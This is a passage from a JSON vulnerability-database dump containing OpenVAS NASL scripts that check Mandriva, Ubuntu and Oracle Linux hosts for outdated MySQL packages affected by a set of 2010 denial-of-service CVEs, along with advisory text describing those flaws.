the\n temporary table, it was re-evaluated, not read from the table and a\n server crash resulted (CVE-2010-3835).\n \n * Pre-evaluation of LIKE predicates during view preparation could\n cause a server crash (CVE-2010-3836).\n \n * GROUP_CONCAT() and WITH ROLLUP together could cause a server crash\n (CVE-2010-3837).\n \n * Queries could cause a server crash if the GREATEST() or LEAST()\n function had a mixed list of numeric and LONGBLOB arguments, and\n the result of such a function was processed using an intermediate\n temporary table (CVE-2010-3838).\n \n * Queries with nested joins could cause an infinite loop in the\n server when used from stored procedures and prepared statements\n (CVE-2010-3839).\n \n * The PolyFromWKB() function could crash the server when improper\n WKB data was passed to the function (CVE-2010-3840).\n \n Additionally the default behaviour of using the mysqlmanager instead\n of the mysqld_safe script has been reverted in the SysV init script\n because of instability issues with the mysqlmanager.\n \n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\n \n The updated packages have been upgraded to mysql 5.0.91 and patched\n to correct these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"mysql on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-11/msg00008.php\");\n script_id(831243);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:222\");\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3833\", \"CVE-2010-3834\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_name(\"Mandriva Update for mysql MDVSA-2010:222 (mysql)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.0.91~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.0.91~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-25T10:55:10", "references": ["1017-1", "http://www.ubuntu.com/usn/usn-1017-1/"], "pluginID": "1361412562310840533", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1017-1", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "type": "openvas", "title": "Ubuntu Update for MySQL vulnerabilities USN-1017-1", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-2008", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2018-01-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840533", "id": "OPENVAS:1361412562310840533", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1017_1.nasl 8510 2018-01-24 07:57:42Z teissa $\n#\n# Ubuntu Update for MySQL vulnerabilities USN-1017-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that MySQL incorrectly handled certain requests with the\n UPGRADE DATA DIRECTORY NAME command. An authenticated user could exploit\n this to make MySQL crash, causing a denial of service. This issue only\n affected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-2008)\n\n It was discovered that MySQL incorrectly handled joins involving a table\n with a unique SET column. An authenticated user could exploit this to make\n MySQL crash, causing a denial of service. This issue only affected Ubuntu\n 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3677)\n \n It was discovered that MySQL incorrectly handled NULL arguments to IN() or\n CASE operations. An authenticated user could exploit this to make MySQL\n crash, causing a denial of service. This issue only affected Ubuntu 9.10\n and 10.04 LTS. (CVE-2010-3678)\n \n It was discovered that MySQL incorrectly handled malformed arguments to the\n BINLOG statement. An authenticated user could exploit this to make MySQL\n crash, causing a denial of service. This issue only affected Ubuntu 9.10\n and 10.04 LTS. (CVE-2010-3679)\n \n It was discovered that MySQL incorrectly handled the use of TEMPORARY\n InnoDB tables with nullable columns. An authenticated user could exploit\n this to make MySQL crash, causing a denial of service. This issue only\n affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3680)\n \n It was discovered that MySQL incorrectly handled alternate reads from two\n indexes on a table using the HANDLER interface. An authenticated user could\n exploit this to make MySQL crash, causing a denial of service. This issue\n only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS.\n (CVE-2010-3681)\n \n It was discovered that MySQL incorrectly handled use of EXPLAIN with\n certain queries. An authenticated user could exploit this to make MySQL\n crash, causing a denial of service. This issue only affected Ubuntu\n 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3682)\n \n It was discovered that MySQL incorrectly handled error reporting when using\n LOAD DATA INFILE and would incorrectly raise an assert in certain\n circumstances. An authenticated user could exploit this to make MySQL\n crash, causing a denial of service. This issue only affected Ubuntu 9.10\n and 10.04 LTS. (CVE-2010-3683)\n \n It was discovered that MySQL incorrectly handled propagation during\n evaluation of arguments to extreme-value functions. An authenticated user\n could exploit this to make MySQL crash, causing a denial of service. This\n issue only affected Ubuntu 8.0 ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1017-1\";\ntag_affected = \"MySQL vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1017-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840533\");\n script_version(\"$Revision: 8510 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 08:57:42 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"USN\", value: \"1017-1\");\n script_cve_id(\"CVE-2010-2008\", \"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\", \"CVE-2010-3834\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_name(\"Ubuntu Update for MySQL vulnerabilities USN-1017-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient16\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.1\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-core-5.1\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient16-dev\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15-dev\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15off\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.0\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient16\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.1\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-core-5.1\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-core-5.1\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-testsuite\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient16-dev\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15-dev\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15off\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.0\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-28T18:24:48", "references": ["http://linux.oracle.com/errata/ELSA-2011-0164.html"], "pluginID": "1361412562310122267", "description": "Oracle Linux Local Security Checks ELSA-2011-0164", "edition": 5, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "title": "Oracle Linux Local Check: ELSA-2011-0164", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122267", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122267", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-0164.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122267\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:15:42 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-0164\");\n script_tag(name:\"insight\", value:\"ELSA-2011-0164 - mysql security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-0164\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-0164.html\");\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.52~1.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.1.52~1.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.1.52~1.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-embedded\", rpm:\"mysql-embedded~5.1.52~1.el6_0.1\", 